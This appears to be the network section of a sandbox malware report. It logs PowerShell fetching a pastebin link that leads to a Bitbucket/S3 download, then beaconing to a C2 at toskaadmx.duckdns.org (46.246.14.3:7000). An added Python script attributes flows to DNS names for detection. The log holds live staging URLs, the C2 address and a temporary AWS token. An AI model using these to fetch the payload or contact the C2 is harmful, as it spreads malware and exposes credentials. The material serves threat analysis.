                                                            Oct 3, 2024 06:54:30.011607885 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:54:30.016689062 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:31.273983955 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:54:31.279567003 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:31.785151958 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:31.787240028 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:54:31.792160034 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:32.851068974 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:32.898682117 CEST497127000192.168.2.546.246.14.3
Oct 3, 2024 06:54:34.321296930 CEST | 49712 | 7000 | 192.168.2.5 | 46.246.14.3
Oct 3, 2024 06:54:34.326423883 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:54:34.555244923 CEST | 49712 | 7000 | 192.168.2.5 | 46.246.14.3
Oct 3, 2024 06:54:34.560581923 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:54:34.704123974 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:54:34.705701113 CEST | 49712 | 7000 | 192.168.2.5 | 46.246.14.3
Oct 3, 2024 06:54:34.710650921 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:54:34.979628086 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:54:34.982207060 CEST | 49712 | 7000 | 192.168.2.5 | 46.246.14.3
Oct 3, 2024 06:54:34.987117052 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:54:41.680248022 CEST | 49712 | 7000 | 192.168.2.5 | 46.246.14.3
Oct 3, 2024 06:54:41.685108900 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:54:42.056653976 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:54:42.058423042 CEST | 49712 | 7000 | 192.168.2.5 | 46.246.14.3
Oct 3, 2024 06:54:42.063283920 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:54:49.914582014 CEST | 49712 | 7000 | 192.168.2.5 | 46.246.14.3
Oct 3, 2024 06:54:49.919584036 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:54:50.292339087 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:54:50.295484066 CEST | 49712 | 7000 | 192.168.2.5 | 46.246.14.3
Oct 3, 2024 06:54:50.300370932 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:54:57.352200031 CEST | 49712 | 7000 | 192.168.2.5 | 46.246.14.3
Oct 3, 2024 06:54:57.365961075 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:54:57.753720045 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:54:57.765253067 CEST | 49712 | 7000 | 192.168.2.5 | 46.246.14.3
Oct 3, 2024 06:54:57.791600943 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:54:59.950887918 CEST | 49712 | 7000 | 192.168.2.5 | 46.246.14.3
Oct 3, 2024 06:54:59.955817938 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:55:00.347038984 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:55:00.348865032 CEST | 49712 | 7000 | 192.168.2.5 | 46.246.14.3
Oct 3, 2024 06:55:00.360052109 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:55:00.648993969 CEST | 49712 | 7000 | 192.168.2.5 | 46.246.14.3
Oct 3, 2024 06:55:00.661462069 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:55:00.836628914 CEST | 49712 | 7000 | 192.168.2.5 | 46.246.14.3
Oct 3, 2024 06:55:00.841701031 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:55:01.063225985 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:55:01.065079927 CEST | 49712 | 7000 | 192.168.2.5 | 46.246.14.3
Oct 3, 2024 06:55:01.069966078 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:55:01.070821047 CEST | 49712 | 7000 | 192.168.2.5 | 46.246.14.3
Oct 3, 2024 06:55:01.075599909 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:55:01.103403091 CEST | 49712 | 7000 | 192.168.2.5 | 46.246.14.3
Oct 3, 2024 06:55:01.108447075 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:55:01.393882036 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:55:01.395978928 CEST | 49712 | 7000 | 192.168.2.5 | 46.246.14.3
Oct 3, 2024 06:55:01.400901079 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:55:01.708782911 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:55:01.710572004 CEST | 49712 | 7000 | 192.168.2.5 | 46.246.14.3
Oct 3, 2024 06:55:01.716747046 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:55:02.020011902 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:55:02.042057991 CEST | 49712 | 7000 | 192.168.2.5 | 46.246.14.3
Oct 3, 2024 06:55:02.047048092 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:55:02.862709999 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:55:02.914439917 CEST | 49712 | 7000 | 192.168.2.5 | 46.246.14.3
Oct 3, 2024 06:55:06.148992062 CEST | 49712 | 7000 | 192.168.2.5 | 46.246.14.3
Oct 3, 2024 06:55:06.156620979 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:55:06.543004990 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:55:06.545749903 CEST | 49712 | 7000 | 192.168.2.5 | 46.246.14.3
Oct 3, 2024 06:55:06.565073967 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:55:15.430324078 CEST | 49712 | 7000 | 192.168.2.5 | 46.246.14.3
Oct 3, 2024 06:55:15.435524940 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:55:15.805767059 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:55:15.806619883 CEST | 49712 | 7000 | 192.168.2.5 | 46.246.14.3
Oct 3, 2024 06:55:15.811460018 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 3, 2024 06:53:05.471793890 CEST | 50263 | 53 | 192.168.2.5 | 1.1.1.1
Oct 3, 2024 06:53:05.478642941 CEST | 53 | 50263 | 1.1.1.1 | 192.168.2.5
Oct 3, 2024 06:53:07.108673096 CEST | 50334 | 53 | 192.168.2.5 | 1.1.1.1
Oct 3, 2024 06:53:07.122102022 CEST | 53 | 50334 | 1.1.1.1 | 192.168.2.5
Oct 3, 2024 06:53:08.514564037 CEST | 62056 | 53 | 192.168.2.5 | 1.1.1.1
Oct 3, 2024 06:53:08.542387009 CEST | 53 | 62056 | 1.1.1.1 | 192.168.2.5
Oct 3, 2024 06:53:13.594391108 CEST | 50623 | 53 | 192.168.2.5 | 1.1.1.1
Oct 3, 2024 06:53:13.601444960 CEST | 53 | 50623 | 1.1.1.1 | 192.168.2.5
Oct 3, 2024 06:53:15.118194103 CEST | 62280 | 53 | 192.168.2.5 | 1.1.1.1
Oct 3, 2024 06:53:15.244723082 CEST | 53 | 62280 | 1.1.1.1 | 192.168.2.5
Oct 3, 2024 06:53:30.022438049 CEST | 59059 | 53 | 192.168.2.5 | 1.1.1.1
Oct 3, 2024 06:53:30.031774998 CEST | 53 | 59059 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 3, 2024 06:53:05.471793890 CEST | 192.168.2.5 | 1.1.1.1 | 0x97e4 | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Oct 3, 2024 06:53:07.108673096 CEST | 192.168.2.5 | 1.1.1.1 | 0xe00b | Standard query (0) | bitbucket.org | A (IP address) | IN (0x0001) | false
Oct 3, 2024 06:53:08.514564037 CEST | 192.168.2.5 | 1.1.1.1 | 0x8f48 | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001) | false
Oct 3, 2024 06:53:13.594391108 CEST | 192.168.2.5 | 1.1.1.1 | 0x69bb | Standard query (0) | paste.ee | A (IP address) | IN (0x0001) | false
Oct 3, 2024 06:53:15.118194103 CEST | 192.168.2.5 | 1.1.1.1 | 0x4664 | Standard query (0) | toskaadmx.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 3, 2024 06:53:30.022438049 CEST | 192.168.2.5 | 1.1.1.1 | 0x4da6 | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 3, 2024 06:53:05.478642941 CEST | 1.1.1.1 | 192.168.2.5 | 0x97e4 | No error (0) | pastebin.com | - | 104.20.4.235 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 06:53:05.478642941 CEST | 1.1.1.1 | 192.168.2.5 | 0x97e4 | No error (0) | pastebin.com | - | 172.67.19.24 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 06:53:05.478642941 CEST | 1.1.1.1 | 192.168.2.5 | 0x97e4 | No error (0) | pastebin.com | - | 104.20.3.235 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 06:53:07.122102022 CEST | 1.1.1.1 | 192.168.2.5 | 0xe00b | No error (0) | bitbucket.org | - | 185.166.143.50 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 06:53:07.122102022 CEST | 1.1.1.1 | 192.168.2.5 | 0xe00b | No error (0) | bitbucket.org | - | 185.166.143.49 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 06:53:07.122102022 CEST | 1.1.1.1 | 192.168.2.5 | 0xe00b | No error (0) | bitbucket.org | - | 185.166.143.48 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 06:53:08.542387009 CEST | 1.1.1.1 | 192.168.2.5 | 0x8f48 | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 3, 2024 06:53:08.542387009 CEST | 1.1.1.1 | 192.168.2.5 | 0x8f48 | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 3, 2024 06:53:08.542387009 CEST | 1.1.1.1 | 192.168.2.5 | 0x8f48 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 52.216.144.11 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 06:53:08.542387009 CEST | 1.1.1.1 | 192.168.2.5 | 0x8f48 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 52.216.56.241 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 06:53:08.542387009 CEST | 1.1.1.1 | 192.168.2.5 | 0x8f48 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 3.5.9.142 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 06:53:08.542387009 CEST | 1.1.1.1 | 192.168.2.5 | 0x8f48 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 3.5.21.148 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 06:53:08.542387009 CEST | 1.1.1.1 | 192.168.2.5 | 0x8f48 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 52.216.212.185 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 06:53:08.542387009 CEST | 1.1.1.1 | 192.168.2.5 | 0x8f48 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 54.231.196.177 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 06:53:08.542387009 CEST | 1.1.1.1 | 192.168.2.5 | 0x8f48 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 52.216.51.17 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 06:53:08.542387009 CEST | 1.1.1.1 | 192.168.2.5 | 0x8f48 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 52.216.38.161 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 06:53:13.601444960 CEST | 1.1.1.1 | 192.168.2.5 | 0x69bb | No error (0) | paste.ee | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 06:53:13.601444960 CEST | 1.1.1.1 | 192.168.2.5 | 0x69bb | No error (0) | paste.ee | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 06:53:15.244723082 CEST | 1.1.1.1 | 192.168.2.5 | 0x4664 | No error (0) | toskaadmx.duckdns.org | - | 46.246.14.3 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 06:53:30.031774998 CEST | 1.1.1.1 | 192.168.2.5 | 0x4da6 | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 3, 2024 06:53:30.031774998 CEST | 1.1.1.1 | 192.168.2.5 | 0x4da6 | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 3, 2024 06:53:30.031774998 CEST | 1.1.1.1 | 192.168.2.5 | 0x4da6 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 3.5.25.83 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 06:53:30.031774998 CEST | 1.1.1.1 | 192.168.2.5 | 0x4da6 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 16.182.69.185 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 06:53:30.031774998 CEST | 1.1.1.1 | 192.168.2.5 | 0x4da6 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 3.5.27.162 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 06:53:30.031774998 CEST | 1.1.1.1 | 192.168.2.5 | 0x4da6 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 52.217.112.17 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 06:53:30.031774998 CEST | 1.1.1.1 | 192.168.2.5 | 0x4da6 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 54.231.168.217 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 06:53:30.031774998 CEST | 1.1.1.1 | 192.168.2.5 | 0x4da6 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 52.216.114.251 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 06:53:30.031774998 CEST | 1.1.1.1 | 192.168.2.5 | 0x4da6 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 52.216.208.241 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 06:53:30.031774998 CEST | 1.1.1.1 | 192.168.2.5 | 0x4da6 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 3.5.25.37 | A (IP address) | IN (0x0001) | false
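The DNS answers above and the TCP packet list earlier in this section are separate tables, so the C2 traffic to 46.246.14.3:7000 appears only as a raw IP; the DNS table is what ties it to toskaadmx.duckdns.org, a dynamic-DNS name, while the 52.216.144.11 download only traces back to bbuseruploads.s3.amazonaws.com through two CNAME hops. The following Python is an added example and not part of the Joe Sandbox report: it joins client-originated flows to the names that resolved to their destination (walking CNAME chains back to the queried name) and flags dynamic-DNS providers. The sample rows are constructed from this report's tables in a pipe-separated layout with a subset of the columns; the :80 and :443 packet rows are reconstructed from the HTTP session times, the 203.0.113.10 flow is a made-up destination with no DNS answer, and the dynamic-DNS suffix list is a starter list of the example's own.

```python
"""Added example: attribute raw TCP flows to the DNS answers that produced them,
following CNAME chains, and flag dynamic-DNS hosts. Not part of the report."""
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Set, Tuple

SANDBOX_IP = "192.168.2.5"
# Starter list; duckdns.org is the provider this sample's C2 name uses.
DYNDNS_SUFFIXES = ("duckdns.org", "no-ip.org", "ddns.net", "hopto.org")

# Constructed from the report's DNS answer table. Columns:
# Timestamp | Src IP | Dst IP | Trans ID | Reply | Name | CName | Address | Type
DNS_ANSWERS = """
Oct 3, 2024 06:53:05.478642941 CEST | 1.1.1.1 | 192.168.2.5 | 0x97e4 | No error (0) | pastebin.com | - | 104.20.4.235 | A (IP address)
Oct 3, 2024 06:53:08.542387009 CEST | 1.1.1.1 | 192.168.2.5 | 0x8f48 | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | - | CNAME (Canonical name)
Oct 3, 2024 06:53:08.542387009 CEST | 1.1.1.1 | 192.168.2.5 | 0x8f48 | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com | - | CNAME (Canonical name)
Oct 3, 2024 06:53:08.542387009 CEST | 1.1.1.1 | 192.168.2.5 | 0x8f48 | No error (0) | s3-w.us-east-1.amazonaws.com | - | 52.216.144.11 | A (IP address)
Oct 3, 2024 06:53:15.244723082 CEST | 1.1.1.1 | 192.168.2.5 | 0x4664 | No error (0) | toskaadmx.duckdns.org | - | 46.246.14.3 | A (IP address)
"""

# Constructed packet rows: Timestamp | Src port | Dst port | Src IP | Dst IP.
# The :80/:443 rows are reconstructed from the HTTP session times; 203.0.113.10
# (RFC 5737 test range) is a made-up destination that no DNS answer covers.
TCP_PACKETS = """
Oct 3, 2024 06:53:05.490550995 CEST | 49704 | 80 | 192.168.2.5 | 104.20.4.235
Oct 3, 2024 06:53:09.000000000 CEST | 49707 | 443 | 192.168.2.5 | 52.216.144.11
Oct 3, 2024 06:54:34.321296930 CEST | 49712 | 7000 | 192.168.2.5 | 46.246.14.3
Oct 3, 2024 06:54:34.326423883 CEST | 7000 | 49712 | 46.246.14.3 | 192.168.2.5
Oct 3, 2024 06:54:41.680248022 CEST | 49712 | 7000 | 192.168.2.5 | 46.246.14.3
Oct 3, 2024 06:55:20.000000000 CEST | 49730 | 8080 | 192.168.2.5 | 203.0.113.10
"""


def parse_rows(text: str) -> List[List[str]]:
    """Split pipe-separated rows into stripped cells."""
    return [[c.strip() for c in line.split("|")] for line in text.strip().splitlines()]


def parse_ts(ts: str) -> datetime:
    """'Oct 3, 2024 06:54:34.321296930 CEST' -> datetime (zone label dropped, ns cut to us)."""
    body, _zone = ts.rsplit(" ", 1)
    head, frac = body.split(".")
    return datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def ip_to_names(dns_answers: str) -> Dict[str, Set[str]]:
    """Map each answered address to the name(s) originally queried for it."""
    alias_of: Dict[str, str] = {}          # CNAME target -> name that pointed at it
    a_records: List[Tuple[str, str]] = []
    for _ts, _src, _dst, _txid, _rc, name, cname, addr, rtype in parse_rows(dns_answers):
        if rtype.startswith("CNAME"):
            alias_of[cname] = name
        elif rtype.startswith("A"):
            a_records.append((name, addr))
    names: Dict[str, Set[str]] = defaultdict(set)
    for name, addr in a_records:
        seen = set()
        while name in alias_of and name not in seen:   # walk the chain back to the query
            seen.add(name)
            name = alias_of[name]
        names[addr].add(name)
    return names


def is_dyndns(name: str) -> bool:
    return any(name == s or name.endswith("." + s) for s in DYNDNS_SUFFIXES)


def attribute_flows(tcp_packets: str, dns_answers: str, client_ip: str = SANDBOX_IP) -> List[dict]:
    """One record per client-originated flow, ordered by its first packet."""
    names = ip_to_names(dns_answers)
    first_seen: Dict[Tuple[str, str, str], datetime] = {}
    for ts, sport, dport, sip, dip in parse_rows(tcp_packets):
        if sip != client_ip:               # server->client packets do not define a flow
            continue
        key, t = (sport, dip, dport), parse_ts(ts)
        if key not in first_seen or t < first_seen[key]:
            first_seen[key] = t
    flows = []
    for (sport, dip, dport), t in sorted(first_seen.items(), key=lambda kv: kv[1]):
        resolved = sorted(names.get(dip, ()))
        flows.append({
            "first_seen": t.isoformat(timespec="microseconds"),
            "src_port": int(sport), "dst_ip": dip, "dst_port": int(dport),
            "names": resolved,
            "dyndns": any(is_dyndns(n) for n in resolved),
            "unresolved": not resolved,    # destination never returned by any DNS answer
        })
    return flows


if __name__ == "__main__":
    for flow in attribute_flows(TCP_PACKETS, DNS_ANSWERS):
        print(flow)
```

Run on the constructed rows, the 7000/tcp flow comes back attributed to toskaadmx.duckdns.org with dyndns set, the S3 flow to bbuseruploads.s3.amazonaws.com, and the 203.0.113.10 flow as unresolved, which in a real capture is itself worth a look (hard-coded C2 address or DNS done outside the monitored resolver).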
• pastebin.com
• bitbucket.org
• bbuseruploads.s3.amazonaws.com
• paste.ee
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 104.20.4.235 | 80 | 6400 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 06:53:05.490550995 CEST | 74 | OUT | GET /raw/V9y5Q5vv HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
Oct 3, 2024 06:53:05.942696095 CEST | 472 | IN | HTTP/1.1 301 Moved Permanently
Date: Thu, 03 Oct 2024 04:53:05 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Thu, 03 Oct 2024 05:53:05 GMT
Location: https://pastebin.com/raw/V9y5Q5vv
Server: cloudflare
CF-RAY: 8cca5397cf9b426d-EWR
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49721 | 104.20.4.235 | 80 | 7096 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 06:53:27.427201986 CEST | 74 | OUT | GET /raw/V9y5Q5vv HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
Oct 3, 2024 06:53:27.892222881 CEST | 472 | IN | HTTP/1.1 301 Moved Permanently
Date: Thu, 03 Oct 2024 04:53:27 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Thu, 03 Oct 2024 05:53:27 GMT
Location: https://pastebin.com/raw/V9y5Q5vv
Server: cloudflare
CF-RAY: 8cca5420fd3d41c0-EWR
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 104.20.4.235 | 443 | 6400 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 04:53:06 UTC | 74 | OUT | GET /raw/V9y5Q5vv HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
2024-10-03 04:53:07 UTC | 388 | IN | HTTP/1.1 200 OK
Date: Thu, 03 Oct 2024 04:53:07 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: MISS
Last-Modified: Thu, 03 Oct 2024 04:53:07 GMT
Server: cloudflare
CF-RAY: 8cca539c2bd4438d-EWR
2024-10-03 04:53:07 UTC | 83 | IN | Data Raw: 34 64 0d 0a 68 74 74 70 73 3a 2f 2f 62 69 74 62 75 63 6b 65 74 2e 6f 72 67 2f 38 39 39 39 39 39 39 39 39 39 39 39 39 39 2f 61 63 61 61 61 61 61 61 61 61 61 2f 64 6f 77 6e 6c 6f 61 64 73 2f 64 73 61 64 73 64 73 61 64 73 61 64 73 61 2e 74 78 74 0d 0a
Data Ascii: 4dhttps://bitbucket.org/89999999999999/acaaaaaaaaa/downloads/dsadsdsadsadsa.txt
2024-10-03 04:53:07 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49706 | 185.166.143.50 | 443 | 6400 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 04:53:07 UTC | 118 | OUT | GET /89999999999999/acaaaaaaaaa/downloads/dsadsdsadsadsa.txt HTTP/1.1
Host: bitbucket.org
Connection: Keep-Alive
2024-10-03 04:53:08 UTC | 5124 | IN | HTTP/1.1 302 Found
Date: Thu, 03 Oct 2024 04:53:08 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Server: AtlassianEdge
Location: https://bbuseruploads.s3.amazonaws.com/5c1faa65-8df1-44b3-9eef-4905cfb21066/downloads/153f1b3b-a7e8-4b91-b2b1-19798dd254b2/dsadsdsadsadsa.txt?response-content-disposition=attachment%3B%20filename%3D%22dsadsdsadsadsa.txt%22&AWSAccessKeyId=ASIA6KOSE3BNKASUWRVB&Signature=GfpU0CqDcq625CnXQ2BwtNOiGJM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEG0aCXVzLWVhc3QtMSJHMEUCIQDs8Rj4z4voHrA56yVpXNvb%2FsFKDQyxi%2B3o3W5qfuWusQIgLqQzvBFMFXX9Pa%2BoyIG%2B32jske%2BWh0S25%2Fynj2NB%2BBcqsAIItv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDMxhE6dop%2BJnHoLfPiqEAr8pHVnooTfi0YZkbhehEoaE1HM1hw7hoHIkopPIOTznsgPJgLmSVn4zaLDAXaFsXvcbpwil5pqs3yLuDuXNAyT6tr7PxdlycD%2FAJaRj7XgTxDLyt2nktlqdkRlEDXnBOTxrFM34uHRZq4gQIcXM%2FdeP1gNTHuVllr4hqgc8BtyPI0oFU6TWGdV61p4JgXiTcM8X%2Fs7Y2pNAaZQaYh1Kwk80bLwXYNBkJqe6fudHaku2Hr19n%2FI7ovUAmCunSxhwXenqzPnDzZTCwFDsnRaZo0mTJvCImTLI6KCQcZQtPWh0Q7P%2BZ8u6QsTrnfwdgKJJpE7FElvkKACOC6bBrj07%2FazaST1qMKXB%2BLcGOp0BIzHMRr4XYnUMQ24ozLJjMYALd1nwf%2BbKAue7hm%2By1s%2B%2BelqorxCz52uzxR1zc6F5j%2F8PF66cEvqBdIobK [TRUNCATED]
Expires: Thu, 03 Oct 2024 04:53:08 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
X-Used-Mesh: False
Vary: Accept-Language, Origin
Content-Language: en
X-View-Name: bitbucket.apps.downloads.views.download_file
X-Dc-Location: Micros-3
X-Served-By: 49d3df9e6680
X-Version: c0c21fc30b85
X-Static-Version: c0c21fc30b85
X-Request-Count: 1773
X-Render-Time: 0.041318655014038086
X-B3-Traceid: 7e9ee825fd3145a9b0b5daf02ab0c10a
X-B3-Spanid: a4953380863fed55
X-Frame-Options: SAMEORIGIN
